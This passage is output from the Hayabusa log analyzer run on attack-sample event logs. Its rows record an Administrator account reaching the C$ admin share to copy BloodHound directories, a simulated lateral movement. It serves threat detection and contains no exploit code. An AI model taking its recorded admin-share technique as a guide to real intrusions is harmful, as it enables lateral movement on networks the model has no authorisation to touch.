10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 
\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 
23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
